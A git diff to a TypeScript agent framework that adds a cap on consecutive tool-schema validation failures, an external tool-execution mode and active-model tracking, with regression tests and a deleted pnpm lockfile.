+		assert.equal(typeof MAX_CONSECUTIVE_VALIDATION_FAILURES, "number");
+		assert.ok(MAX_CONSECUTIVE_VALIDATION_FAILURES >= 2, "Cap must be at least 2 to allow one retry");
+		assert.ok(MAX_CONSECUTIVE_VALIDATION_FAILURES <= 10, "Cap must not be unreasonably high");
+	});
+
+	it("does NOT trip schema overload cap on tool execution errors like bash exit code 1 (#3618)", async () => {
+		// Simulates the real scenario: a tool (bash) that passes validation but
+		// throws during execution (e.g. rg/grep returning exit code 1 = no matches).
+		// These are valid tool invocations — the schema was correct, the tool ran,
+		// it just returned a non-zero exit code. The cap should only trigger for
+		// preparation/schema failures, not execution failures.
+		const bashTool: AgentTool<any> = {
+			name: "bash",
+			label: "Bash",
+			description: "Run a bash command",
+			parameters: Type.Object({
+				command: Type.String(),
+			}),
+			execute: async () => {
+				// Simulate bash tool rejecting on non-zero exit code
+				throw new Error("(no output)\n\nCommand exited with code 1");
+			},
+		};
+
+		// LLM sends valid tool calls (schema is correct) that fail at execution
+		const validBashCall = makeAssistantMessage({
+			content: [
+				{
+					type: "toolCall",
+					id: `tc_bash_${Date.now()}_${Math.random()}`,
+					name: "bash",
+					arguments: { command: "rg -l 'nonexistent' src/" },
+				},
+			],
+			stopReason: "toolUse",
+		});
+		const finalStop = makeAssistantMessage({
+			content: [{ type: "text", text: "No references found." }],
+			stopReason: "stop",
+		});
+
+		// Send more than MAX_CONSECUTIVE_VALIDATION_FAILURES bash calls that throw
+		const responses: AssistantMessage[] = [];
+		for (let i = 0; i < MAX_CONSECUTIVE_VALIDATION_FAILURES + 2; i++) {
+			responses.push(validBashCall);
+		}
+		responses.push(finalStop);
+
+		const mockStream = createMockStreamFn(responses);
+
+		const context: AgentContext = {
+			systemPrompt: "You are a test agent.",
+			messages: [{ role: "user", content: [{ type: "text", text: "Search for references" }], timestamp: Date.now() }],
+			tools: [bashTool],
+		};
+
+		const config: AgentLoopConfig = {
+			model: TEST_MODEL,
+			convertToLlm: (msgs) => msgs.filter((m): m is any => m.role !== "custom"),
+			toolExecution: "sequential",
+		};
+
+		const stream = agentLoop(
+			[{ role: "user", content: [{ type: "text", text: "Search for references" }], timestamp: Date.now() }],
+			context,
+			config,
+			undefined,
+			mockStream as any,
+		);
+
+		const events = await collectEvents(stream);
+
+		// Must complete normally — execution errors should NOT trigger the cap
+		const agentEnd = events.find((e) => e.type === "agent_end");
+		assert.ok(agentEnd, "agent loop must emit agent_end");
+
+		// Count tool execution errors
+		const toolErrors = events.filter(
+			(e) => e.type === "tool_execution_end" && e.isError === true,
+		);
+
+		// All bash calls should have been attempted (not capped early)
+		assert.ok(
+			toolErrors.length >= MAX_CONSECUTIVE_VALIDATION_FAILURES + 2,
+			`Expected all ${MAX_CONSECUTIVE_VALIDATION_FAILURES + 2} bash execution errors to be processed (not capped), got ${toolErrors.length}`,
+		);
+
+		// The stop message should NOT contain the schema overload text
+		const allMessages = (agentEnd as any).messages as AgentMessage[];
+		const lastMessage = allMessages[allMessages.length - 1];
+		const lastText = lastMessage.role === "assistant"
+			? (lastMessage as AssistantMessage).content.find((c) => c.type === "text")
+			: undefined;
+		if (lastText && lastText.type === "text") {
+			assert.ok(
+				!lastText.text.includes("consecutive turns with all tool calls failing"),
+				"Final message must NOT contain schema overload stop text for execution-only errors",
+			);
+		}
+	});
+});
diff --git a/packages/pi-agent-core/src/agent-loop.ts b/packages/pi-agent-core/src/agent-loop.ts
index 436f7b291..f8c7e9231 100644
--- a/packages/pi-agent-core/src/agent-loop.ts
+++ b/packages/pi-agent-core/src/agent-loop.ts
@@ -22,6 +22,15 @@ import type {
 	StreamFn,
 } from "./types.js";
 
+/**
+ * Maximum number of consecutive turns where ALL tool calls in the turn fail
+ * schema validation before the loop terminates. This prevents unbounded retry
+ * loops when the LLM repeatedly emits tool calls with arguments that cannot
+ * pass validation (e.g., schema overload, truncated JSON, missing required
+ * fields). See: https://github.com/gsd-build/gsd-2/issues/2783
+ */
+export const MAX_CONSECUTIVE_VALIDATION_FAILURES = 3;
+
 export const ZERO_USAGE = {
 	input: 0,
 	output: 0,
@@ -135,7 +144,10 @@ export function agentLoopContinue(
 
 	(async () => {
 		const newMessages: AgentMessage[] = [];
-		const currentContext: AgentContext = { ...context };
+		const currentContext: AgentContext = {
+			...context,
+			messages: [...context.messages],
+		};
 
 		stream.push({ type: "agent_start" });
 		stream.push({ type: "turn_start" });
@@ -172,6 +184,12 @@ async function runLoop(
 	// Check for steering messages at start (user may have typed while waiting)
 	let pendingMessages: AgentMessage[] = (await config.getSteeringMessages?.()) || [];
 
+	// Track consecutive turns where ALL tool calls fail validation.
+	// When the LLM repeatedly emits tool calls with schema-overloaded or malformed
+	// arguments, each turn produces only error tool results. Without a cap, this
+	// creates an unbounded retry loop that burns budget. (#2783)
+	let consecutiveAllToolErrorTurns = 0;
+
 	// Outer loop: continues when queued follow-up messages arrive after agent would stop
 	while (true) {
 		let hasMoreToolCalls = true;
@@ -228,12 +246,38 @@ async function runLoop(
 				return;
 			}
 
-			// Check for tool calls
+			// Check for tool calls or paused server turn
 			const toolCalls = message.content.filter((c) => c.type === "toolCall");
-			hasMoreToolCalls = toolCalls.length > 0;
+			hasMoreToolCalls =
+				toolCalls.length > 0 || message.stopReason === "pauseTurn";
 
 			const toolResults: ToolResultMessage[] = [];
-			if (hasMoreToolCalls) {
+			if (hasMoreToolCalls && config.externalToolExecution) {
+				// External execution mode: tools were handled by the provider
+				// (e.g., Claude Code SDK). Emit tool_execution events for each
+				// tool call. The TUI adds these as components after the message.
+				for (const tc of toolCalls as AgentToolCall[]) {
+					stream.push({
+						type: "tool_execution_start",
+						toolCallId: tc.id,
+						toolName: tc.name,
+						args: tc.arguments,
+					});
+					stream.push({
+						type: "tool_execution_end",
+						toolCallId: tc.id,
+						toolName: tc.name,
+						result: {
+							content: [{ type: "text", text: "(executed by Claude Code)" }],
+							details: {},
+						},
+						isError: false,
+					});
+				}
+				// Don't add tool results to context or loop back — the streamSimple
+				// call already ran the full multi-turn agentic loop.
+				hasMoreToolCalls = false;
+			} else if (hasMoreToolCalls) {
 				const toolExecution = await executeToolCalls(
 					currentContext,
 					message,
@@ -248,6 +292,54 @@ async function runLoop(
 					currentContext.messages.push(result);
 					newMessages.push(result);
 				}
+
+				// Schema overload detection (#2783): count only preparation-phase
+				// errors (schema validation, tool-not-found, tool-blocked) toward the
+				// consecutive failure cap. Tool execution errors — such as bash
+				// commands returning non-zero exit codes (e.g. grep/rg exit 1 for
+				// "no matches") — are valid tool usage and must NOT trigger the cap.
+				// See: #3618
+				const hasPreparationErrors = toolExecution.preparationErrorCount > 0;
+				const allToolsFailedPreparation =
+					toolResults.length > 0 &&
+					toolExecution.preparationErrorCount === toolResults.length;
+				if (allToolsFailedPreparation) {
+					consecutiveAllToolErrorTurns++;
+				} else if (!hasPreparationErrors) {
+					// Reset only when there are zero preparation errors this turn.
+					// Mixed turns (some prep errors, some successes) don't reset,
+					// but they also don't increment — this avoids masking a
+					// pattern of alternating schema failures with one working call.
+					consecutiveAllToolErrorTurns = 0;
+				}
+
+				if (consecutiveAllToolErrorTurns >= MAX_CONSECUTIVE_VALIDATION_FAILURES) {
+					// Force-stop: the LLM is stuck retrying broken tool calls.
+					// Emit the turn_end and terminate the agent loop cleanly.
+					stream.push({ type: "turn_end", message, toolResults });
+					const stopMessage: AssistantMessage = {
+						role: "assistant",
+						content: [
+							{
+								type: "text",
+								text: `Agent stopped: ${consecutiveAllToolErrorTurns} consecutive turns with all tool calls failing. This usually means the model is repeatedly sending arguments that do not match the tool schema.`,
+							},
+						],
+						api: config.model.api,
+						provider: config.model.provider,
+						model: config.model.id,
+						usage: ZERO_USAGE,
+						stopReason: "error",
+						errorMessage: "Schema overload: consecutive tool validation failures exceeded cap",
+						timestamp: Date.now(),
+					};
+					emitMessagePair(stream, stopMessage);
+					newMessages.push(stopMessage);
+					stream.push({ type: "turn_end", message: stopMessage, toolResults: [] });
+					stream.push({ type: "agent_end", messages: newMessages });
+					stream.end(newMessages);
+					return;
+				}
 			}
 
 			stream.push({ type: "turn_end", message, toolResults });
@@ -370,6 +462,19 @@ async function streamAssistantResponse(
 	return await response.result();
 }
 
+/**
+ * Result from executing tool calls in a turn. Includes metadata about
+ * error provenance so the schema overload detector can distinguish
+ * preparation failures (schema validation, tool-not-found, tool-blocked)
+ * from execution failures (the tool ran but threw, e.g. bash exit code 1).
+ */
+interface ToolExecutionResult {
+	toolResults: ToolResultMessage[];
+	steeringMessages?: AgentMessage[];
+	/** Number of tool results that failed during preparation (validation/schema). */
+	preparationErrorCount: number;
+}
+
 /**
  * Execute tool calls from an assistant message.
  */
@@ -379,7 +484,7 @@ async function executeToolCalls(
 	config: AgentLoopConfig,
 	signal: AbortSignal | undefined,
 	stream: EventStream<AgentEvent, AgentMessage[]>,
-): Promise<{ toolResults: ToolResultMessage[]; steeringMessages?: AgentMessage[] }> {
+): Promise<ToolExecutionResult> {
 	const toolCalls = assistantMessage.content.filter((c) => c.type === "toolCall") as AgentToolCall[];
 	if (config.toolExecution === "sequential") {
 		return executeToolCallsSequential(currentContext, assistantMessage, toolCalls, config, signal, stream);
@@ -394,9 +499,10 @@ async function executeToolCallsSequential(
 	config: AgentLoopConfig,
 	signal: AbortSignal | undefined,
 	stream: EventStream<AgentEvent, AgentMessage[]>,
-): Promise<{ toolResults: ToolResultMessage[]; steeringMessages?: AgentMessage[] }> {
+): Promise<ToolExecutionResult> {
 	const results: ToolResultMessage[] = [];
 	let steeringMessages: AgentMessage[] | undefined;
+	let preparationErrorCount = 0;
 
 	for (let index = 0; index < toolCalls.length; index++) {
 		const toolCall = toolCalls[index];
@@ -409,6 +515,9 @@ async function executeToolCallsSequential(
 
 		const preparation = await prepareToolCall(currentContext, assistantMessage, toolCall, config, signal);
 		if (preparation.kind === "immediate") {
+			if (preparation.isError) {
+				preparationErrorCount++;
+			}
 			results.push(emitToolCallOutcome(toolCall, preparation.result, preparation.isError, stream));
 		} else {
 			const executed = await executePreparedToolCall(preparation, signal, stream);
@@ -438,7 +547,7 @@ async function executeToolCallsSequential(
 		}
 	}
 
-	return { toolResults: results, steeringMessages };
+	return { toolResults: results, steeringMessages, preparationErrorCount };
 }
 
 async function executeToolCallsParallel(
@@ -448,10 +557,11 @@ async function executeToolCallsParallel(
 	config: AgentLoopConfig,
 	signal: AbortSignal | undefined,
 	stream: EventStream<AgentEvent, AgentMessage[]>,
-): Promise<{ toolResults: ToolResultMessage[]; steeringMessages?: AgentMessage[] }> {
+): Promise<ToolExecutionResult> {
 	const results: ToolResultMessage[] = [];
 	const runnableCalls: PreparedToolCall[] = [];
 	let steeringMessages: AgentMessage[] | undefined;
+	let preparationErrorCount = 0;
 
 	for (let index = 0; index < toolCalls.length; index++) {
 		const toolCall = toolCalls[index];
@@ -464,6 +574,9 @@ async function executeToolCallsParallel(
 
 		const preparation = await prepareToolCall(currentContext, assistantMessage, toolCall, config, signal);
 		if (preparation.kind === "immediate") {
+			if (preparation.isError) {
+				preparationErrorCount++;
+			}
 			results.push(emitToolCallOutcome(toolCall, preparation.result, preparation.isError, stream));
 		} else {
 			runnableCalls.push(preparation);
@@ -480,7 +593,7 @@ async function executeToolCallsParallel(
 				for (const skipped of remainingCalls) {
 					results.push(skipToolCall(skipped, stream));
 				}
-				return { toolResults: results, steeringMessages };
+				return { toolResults: results, steeringMessages, preparationErrorCount };
 			}
 		}
 	}
@@ -512,7 +625,7 @@ async function executeToolCallsParallel(
 		}
 	}
 
-	return { toolResults: results, steeringMessages };
+	return { toolResults: results, steeringMessages, preparationErrorCount };
 }
 
 type PreparedToolCall = {
diff --git a/packages/pi-agent-core/src/agent.test.ts b/packages/pi-agent-core/src/agent.test.ts
new file mode 100644
index 000000000..e0b838cd4
--- /dev/null
+++ b/packages/pi-agent-core/src/agent.test.ts
@@ -0,0 +1,53 @@
+// Agent activeInferenceModel regression tests
+// Verifies that activeInferenceModel is set/cleared correctly in _runLoop,
+// and that the footer reads activeInferenceModel instead of state.model.
+// Regression test for https://github.com/gsd-build/gsd-2/issues/1844 Bug 2
+
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+describe("Agent — activeInferenceModel (#1844 Bug 2)", () => {
+	it("activeInferenceModel is declared in AgentState interface", () => {
+		const typesSource = readFileSync(join(__dirname, "types.ts"), "utf-8");
+		assert.match(typesSource, /activeInferenceModel\??:\s*Model/,
+			"AgentState must declare activeInferenceModel field");
+	});
+
+	it("_runLoop sets activeInferenceModel before streaming and clears in finally", () => {
+		const agentSource = readFileSync(join(__dirname, "agent.ts"), "utf-8");
+
+		// Must set activeInferenceModel = model before streaming starts
+		const setLine = agentSource.indexOf("this._state.activeInferenceModel = model");
+		assert.ok(setLine > -1, "agent.ts must set activeInferenceModel = model in _runLoop");
+
+		// Must clear activeInferenceModel = undefined after streaming completes
+		const clearLine = agentSource.indexOf("this._state.activeInferenceModel = undefined");
+		assert.ok(clearLine > -1, "agent.ts must clear activeInferenceModel in finally block");
+
+		// The set must come before the clear
+		assert.ok(setLine < clearLine, "activeInferenceModel must be set before cleared");
+	});
+
+	it("footer displays activeInferenceModel instead of state.model", () => {
+		const footerPath = join(__dirname, "..", "..", "pi-coding-agent", "src",
+			"modes", "interactive", "components", "footer.ts");
+		const footerSource = readFileSync(footerPath, "utf-8");
+		assert.match(footerSource, /activeInferenceModel/,
+			"footer.ts must reference activeInferenceModel for display");
+	});
+
+	it("activeInferenceModel is set before AbortController creation", () => {
+		const agentSource = readFileSync(join(__dirname, "agent.ts"), "utf-8");
+
+		const setLine = agentSource.indexOf("this._state.activeInferenceModel = model");
+		const abortLine = agentSource.indexOf("this.abortController = new AbortController");
+		assert.ok(setLine > -1 && abortLine > -1);
+		assert.ok(setLine < abortLine,
+			"activeInferenceModel must be set before streaming infrastructure is created");
+	});
+});
diff --git a/packages/pi-agent-core/src/agent.ts b/packages/pi-agent-core/src/agent.ts
index 112573650..e65ae7a35 100644
--- a/packages/pi-agent-core/src/agent.ts
+++ b/packages/pi-agent-core/src/agent.ts
@@ -101,6 +101,13 @@ export interface AgentOptions {
 	 * Default: 60000 (60 seconds). Set to 0 to disable the cap.
 	 */
 	maxRetryDelayMs?: number;
+
+	/**
+	 * Determines whether a model uses external tool execution (tools handled
+	 * by the provider, not dispatched locally). Evaluated per-loop so model
+	 * switches mid-session are handled correctly.
+	 */
+	externalToolExecution?: (model: Model<any>) => boolean;
 }
 
 /**
@@ -144,6 +151,7 @@ export class Agent {
 	private _maxRetryDelayMs?: number;
 	private _beforeToolCall?: AgentLoopConfig["beforeToolCall"];
 	private _afterToolCall?: AgentLoopConfig["afterToolCall"];
+	private _externalToolExecution?: (model: Model<any>) => boolean;
 
 	constructor(opts: AgentOptions = {}) {
 		this._state = { ...this._state, ...opts.initialState };
@@ -158,6 +166,7 @@ export class Agent {
 		this._thinkingBudgets = opts.thinkingBudgets;
 		this._transport = opts.transport ?? "sse";
 		this._maxRetryDelayMs = opts.maxRetryDelayMs;
+		this._externalToolExecution = opts.externalToolExecution;
 	}
 
 	/**
@@ -457,6 +466,8 @@ export class Agent {
 		const model = this._state.model;
 		if (!model) throw new Error("No model configured");
 
+		this._state.activeInferenceModel = model;
+
 		this.runningPrompt = new Promise<void>((resolve) => {
 			this.resolveRunningPrompt = resolve;
 		});
@@ -497,6 +508,7 @@ export class Agent {
 			getFollowUpMessages: async () => this.dequeueFollowUpMessages(),
 			beforeToolCall: this._beforeToolCall,
 			afterToolCall: this._afterToolCall,
+			externalToolExecution: this._externalToolExecution?.(model) ?? false,
 		};
 
 		let partial: AgentMessage | null = null;
@@ -581,6 +593,7 @@ export class Agent {
 			this._state.isStreaming = false;
 			this._state.streamMessage = null;
 			this._state.pendingToolCalls = new Set<string>();
+			this._state.activeInferenceModel = undefined;
 			this.abortController = undefined;
 			this.resolveRunningPrompt?.();
 			this.runningPrompt = undefined;
diff --git a/packages/pi-agent-core/src/proxy.ts b/packages/pi-agent-core/src/proxy.ts
index 619521bda..574ec2bf6 100644
--- a/packages/pi-agent-core/src/proxy.ts
+++ b/packages/pi-agent-core/src/proxy.ts
@@ -47,7 +47,7 @@ export type ProxyAssistantMessageEvent =
 	| { type: "toolcall_end"; contentIndex: number }
 	| {
 			type: "done";
-			reason: Extract<StopReason, "stop" | "length" | "toolUse">;
+			reason: Extract<StopReason, "stop" | "length" | "toolUse" | "pauseTurn">;
 			usage: AssistantMessage["usage"];
 	  }
 	| {
diff --git a/packages/pi-agent-core/src/types.ts b/packages/pi-agent-core/src/types.ts
index cfeba8895..846764edd 100644
--- a/packages/pi-agent-core/src/types.ts
+++ b/packages/pi-agent-core/src/types.ts
@@ -193,6 +193,16 @@ export interface AgentLoopConfig extends SimpleStreamOptions {
 	 * The hook receives the agent abort signal and is responsible for honoring it.
 	 */
 	afterToolCall?: (context: AfterToolCallContext, signal?: AbortSignal) => Promise<AfterToolCallResult | undefined>;
+
+	/**
+	 * When true, tool calls in assistant messages are rendered in the TUI
+	 * but NOT executed locally. Used for providers that handle tool execution
+	 * internally (e.g., Claude Code CLI via Agent SDK).
+	 *
+	 * The agent loop emits tool_execution_start/end events for TUI rendering
+	 * but skips tool.execute() and does not add tool results to context.
+	 */
+	externalToolExecution?: boolean;
 }
 
 /**
@@ -239,6 +249,12 @@ export interface AgentState {
 	streamMessage: AgentMessage | null;
 	pendingToolCalls: Set<string>;
 	error?: string;
+	/**
+	 * The model currently being used for inference. Set at _runLoop() start,
+	 * cleared when the loop ends. When present, UI should display this instead
+	 * of `model` to avoid showing a stale value after a mid-turn model switch.
+	 */
+	activeInferenceModel?: Model<any>;
 }
 
 export interface AgentToolResult<T> {
diff --git a/packages/pi-agent-core/tsconfig.json b/packages/pi-agent-core/tsconfig.json
index 6f6331d49..26fd8b429 100644
--- a/packages/pi-agent-core/tsconfig.json
+++ b/packages/pi-agent-core/tsconfig.json
@@ -23,5 +23,5 @@
     "rootDir": "./src"
   },
   "include": ["src/**/*.ts"],
-  "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts"]
+  "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts", "src/**/*.test.ts"]
 }
diff --git a/packages/pi-ai/pnpm-lock.yaml b/packages/pi-ai/pnpm-lock.yaml
deleted file mode 100644
index 89cc9199b..000000000
--- a/packages/pi-ai/pnpm-lock.yaml
+++ /dev/null
@@ -1,2022 +0,0 @@
-lockfileVersion: '9.0'
-
-settings:
-  autoInstallPeers: true
-  excludeLinksFromLockfile: false
-
-importers:
-
-  .:
-    dependencies:
-      '@anthropic-ai/sdk':
-        specifier: ^0.73.0
-        version: 0.73.0(zod@4.3.6)
-      '@aws-sdk/client-bedrock-runtime':
-        specifier: ^3.983.0
-        version: 3.1009.0
-      '@google/genai':
-        specifier: ^1.40.0
-        version: 1.45.0
-      '@mistralai/mistralai':
-        specifier: 1.14.1
-        version: 1.14.1
-      '@sinclair/typebox':
-        specifier: ^0.34.41
-        version: 0.34.48
-      ajv:
-        specifier: ^8.17.1
-        version: 8.18.0
-      ajv-formats:
-        specifier: ^3.0.1
-        version: 3.0.1(ajv@8.18.0)
-      chalk:
-        specifier: ^5.6.2
-        version: 5.6.2
-      openai:
-        specifier: 6.26.0
-        version: 6.26.0(ws@8.19.0)(zod@4.3.6)
-      proxy-agent:
-        specifier: ^6.5.0
-        version: 6.5.0
-      undici:
-        specifier: ^7.24.2
-        version: 7.24.4
-      zod-to-json-schema:
-        specifier: ^3.24.6
-        version: 3.25.1(zod@4.3.6)
-    devDependencies:
-      '@smithy/node-http-handler':
-        specifier: ^4.5.0
-        version: 4.5.0
-
-packages:
-
-  '@anthropic-ai/sdk@0.73.0':
-    resolution: {integrity: sha512-URURVzhxXGJDGUGFunIOtBlSl7KWvZiAAKY/ttTkZAkXT9bTPqdk2eK0b8qqSxXpikh3QKPnPYpiyX98zf5ebw==}
-    hasBin: true
-    peerDependencies:
-      zod: ^3.25.0 || ^4.0.0
-    peerDependenciesMeta:
-      zod:
-        optional: true
-
-  '@aws-crypto/crc32@5.2.0':
-    resolution: {integrity: sha512-nLbCWqQNgUiwwtFsen1AdzAtvuLRsQS8rYgMuxCrdKf9kOssamGLuPwyTY9wyYblNr9+1XM8v6zoDTPPSIeANg==}
-    engines: {node: '>=16.0.0'}
-
-  '@aws-crypto/sha256-browser@5.2.0':
-    resolution: {integrity: sha512-AXfN/lGotSQwu6HNcEsIASo7kWXZ5HYWvfOmSNKDsEqC4OashTp8alTmaz+F7TC2L083SFv5RdB+qU3Vs1kZqw==}
-
-  '@aws-crypto/sha256-js@5.2.0':
-    resolution: {integrity: sha512-FFQQyu7edu4ufvIZ+OadFpHHOt+eSTBaYaki44c+akjg7qZg9oOQeLlk77F6tSYqjDAFClrHJk9tMf0HdVyOvA==}
-    engines: {node: '>=16.0.0'}
-
-  '@aws-crypto/supports-web-crypto@5.2.0':
-    resolution: {integrity: sha512-iAvUotm021kM33eCdNfwIN//F77/IADDSs58i+MDaOqFrVjZo9bAal0NK7HurRuWLLpF1iLX7gbWrjHjeo+YFg==}
-
-  '@aws-crypto/util@5.2.0':
-    resolution: {integrity: sha512-4RkU9EsI6ZpBve5fseQlGNUWKMa1RLPQ1dnjnQoe07ldfIzcsGb5hC5W0Dm7u423KWzawlrpbjXBrXCEv9zazQ==}
-
-  '@aws-sdk/client-bedrock-runtime@3.1009.0':
-    resolution: {integrity: sha512-0k9d0oO6nw3Y6jtgs1cmMPNuwAVPQahIoshKK3NDfhVQR1wNC90/gSpdfa9GKswe8XRq/ZZlq7ny0qM1rd/Hkg==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/core@3.973.20':
-    resolution: {integrity: sha512-i3GuX+lowD892F3IuJf8o6AbyDupMTdyTxQrCJGcn71ni5hTZ82L4nQhcdumxZ7XPJRJJVHS/CR3uYOIIs0PVA==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/credential-provider-env@3.972.18':
-    resolution: {integrity: sha512-X0B8AlQY507i5DwjLByeU2Af4ARsl9Vr84koDcXCbAkplmU+1xBFWxEPrWRAoh56waBne/yJqEloSwvRf4x6XA==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/credential-provider-http@3.972.20':
-    resolution: {integrity: sha512-ey9Lelj001+oOfrbKmS6R2CJAiXX7QKY4Vj9VJv6L2eE6/VjD8DocHIoYqztTm70xDLR4E1jYPTKfIui+eRNDA==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/credential-provider-ini@3.972.20':
-    resolution: {integrity: sha512-5flXSnKHMloObNF+9N0cupKegnH1Z37cdVlpETVgx8/rAhCe+VNlkcZH3HDg2SDn9bI765S+rhNPXGDJJPfbtA==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/credential-provider-login@3.972.20':
-    resolution: {integrity: sha512-gEWo54nfqp2jABMu6HNsjVC4hDLpg9HC8IKSJnp0kqWtxIJYHTmiLSsIfI4ScQjxEwpB+jOOH8dOLax1+hy/Hw==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/credential-provider-node@3.972.21':
-    resolution: {integrity: sha512-hah8if3/B/Q+LBYN5FukyQ1Mym6PLPDsBOBsIgNEYD6wLyZg0UmUF/OKIVC3nX9XH8TfTPuITK+7N/jenVACWA==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/credential-provider-process@3.972.18':
-    resolution: {integrity: sha512-Tpl7SRaPoOLT32jbTWchPsn52hYYgJ0kpiFgnwk8pxTANQdUymVSZkzFvv1+oOgZm1CrbQUP9MBeoMZ9IzLZjA==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/credential-provider-sso@3.972.20':
-    resolution: {integrity: sha512-p+R+PYR5Z7Gjqf/6pvbCnzEHcqPCpLzR7Yf127HjJ6EAb4hUcD+qsNRnuww1sB/RmSeCLxyay8FMyqREw4p1RA==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/credential-provider-web-identity@3.972.20':
-    resolution: {integrity: sha512-rWCmh8o7QY4CsUj63qopzMzkDq/yPpkrpb+CnjBEFSOg/02T/we7sSTVg4QsDiVS9uwZ8VyONhq98qt+pIh3KA==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/eventstream-handler-node@3.972.11':
-    resolution: {integrity: sha512-2IrLrOruRr1NhTK0vguBL1gCWv1pu4bf4KaqpsA+/vCJpFEbvXFawn71GvCzk1wyjnDUsemtKypqoKGv4cSGbA==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/middleware-eventstream@3.972.8':
-    resolution: {integrity: sha512-r+oP+tbCxgqXVC3pu3MUVePgSY0ILMjA+aEwOosS77m3/DRbtvHrHwqvMcw+cjANMeGzJ+i0ar+n77KXpRA8RQ==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/middleware-host-header@3.972.8':
-    resolution: {integrity: sha512-wAr2REfKsqoKQ+OkNqvOShnBoh+nkPurDKW7uAeVSu6kUECnWlSJiPvnoqxGlfousEY/v9LfS9sNc46hjSYDIQ==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/middleware-logger@3.972.8':
-    resolution: {integrity: sha512-CWl5UCM57WUFaFi5kB7IBY1UmOeLvNZAZ2/OZ5l20ldiJ3TiIz1pC65gYj8X0BCPWkeR1E32mpsCk1L1I4n+lA==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/middleware-recursion-detection@3.972.8':
-    resolution: {integrity: sha512-BnnvYs2ZEpdlmZ2PNlV2ZyQ8j8AEkMTjN79y/YA475ER1ByFYrkVR85qmhni8oeTaJcDqbx364wDpitDAA/wCA==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/middleware-user-agent@3.972.21':
-    resolution: {integrity: sha512-62XRl1GDYPpkt7cx1AX1SPy9wgNE9Iw/NPuurJu4lmhCWS7sGKO+kS53TQ8eRmIxy3skmvNInnk0ZbWrU5Dpyg==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/middleware-websocket@3.972.13':
-    resolution: {integrity: sha512-Gp6EWIqHX5wmsOR5ZxWyyzEU8P0xBdSxkm6VHEwXwBqScKZ7QWRoj6ZmHpr+S44EYb5tuzGya4ottsogSu2W3A==}
-    engines: {node: '>= 14.0.0'}
-
-  '@aws-sdk/nested-clients@3.996.10':
-    resolution: {integrity: sha512-SlDol5Z+C7Ivnc2rKGqiqfSUmUZzY1qHfVs9myt/nxVwswgfpjdKahyTzLTx802Zfq0NFRs7AejwKzzzl5Co2w==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/region-config-resolver@3.972.8':
-    resolution: {integrity: sha512-1eD4uhTDeambO/PNIDVG19A6+v4NdD7xzwLHDutHsUqz0B+i661MwQB2eYO4/crcCvCiQG4SRm1k81k54FEIvw==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/token-providers@3.1009.0':
-    resolution: {integrity: sha512-KCPLuTqN9u0Rr38Arln78fRG9KXpzsPWmof+PZzfAHMMQq2QED6YjQrkrfiH7PDefLWEposY1o4/eGwrmKA4JA==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/types@3.973.6':
-    resolution: {integrity: sha512-Atfcy4E++beKtwJHiDln2Nby8W/mam64opFPTiHEqgsthqeydFS1pY+OUlN1ouNOmf8ArPU/6cDS65anOP3KQw==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/util-endpoints@3.996.5':
-    resolution: {integrity: sha512-Uh93L5sXFNbyR5sEPMzUU8tJ++Ku97EY4udmC01nB8Zu+xfBPwpIwJ6F7snqQeq8h2pf+8SGN5/NoytfKgYPIw==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/util-format-url@3.972.8':
-    resolution: {integrity: sha512-J6DS9oocrgxM8xlUTTmQOuwRF6rnAGEujAN9SAzllcrQmwn5iJ58ogxy3SEhD0Q7JZvlA5jvIXBkpQRqEqlE9A==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/util-locate-window@3.965.5':
-    resolution: {integrity: sha512-WhlJNNINQB+9qtLtZJcpQdgZw3SCDCpXdUJP7cToGwHbCWCnRckGlc6Bx/OhWwIYFNAn+FIydY8SZ0QmVu3xTQ==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws-sdk/util-user-agent-browser@3.972.8':
-    resolution: {integrity: sha512-B3KGXJviV2u6Cdw2SDY2aDhoJkVfY/Q/Trwk2CMSkikE1Oi6gRzxhvhIfiRpHfmIsAhV4EA54TVEX8K6CbHbkA==}
-
-  '@aws-sdk/util-user-agent-node@3.973.7':
-    resolution: {integrity: sha512-Hz6EZMUAEzqUd7e+vZ9LE7mn+5gMbxltXy18v+YSFY+9LBJz15wkNZvw5JqfX3z0FS9n3bgUtz3L5rAsfh4YlA==}
-    engines: {node: '>=20.0.0'}
-    peerDependencies:
-      aws-crt: '>=1.0.0'
-    peerDependenciesMeta:
-      aws-crt:
-        optional: true
-
-  '@aws-sdk/xml-builder@3.972.11':
-    resolution: {integrity: sha512-iitV/gZKQMvY9d7ovmyFnFuTHbBAtrmLnvaSb/3X8vOKyevwtpmEtyc8AdhVWZe0pI/1GsHxlEvQeOePFzy7KQ==}
-    engines: {node: '>=20.0.0'}
-
-  '@aws/lambda-invoke-store@0.2.4':
-    resolution: {integrity: sha512-iY8yvjE0y651BixKNPgmv1WrQc+GZ142sb0z4gYnChDDY2YqI4P/jsSopBWrKfAt7LOJAkOXt7rC/hms+WclQQ==}
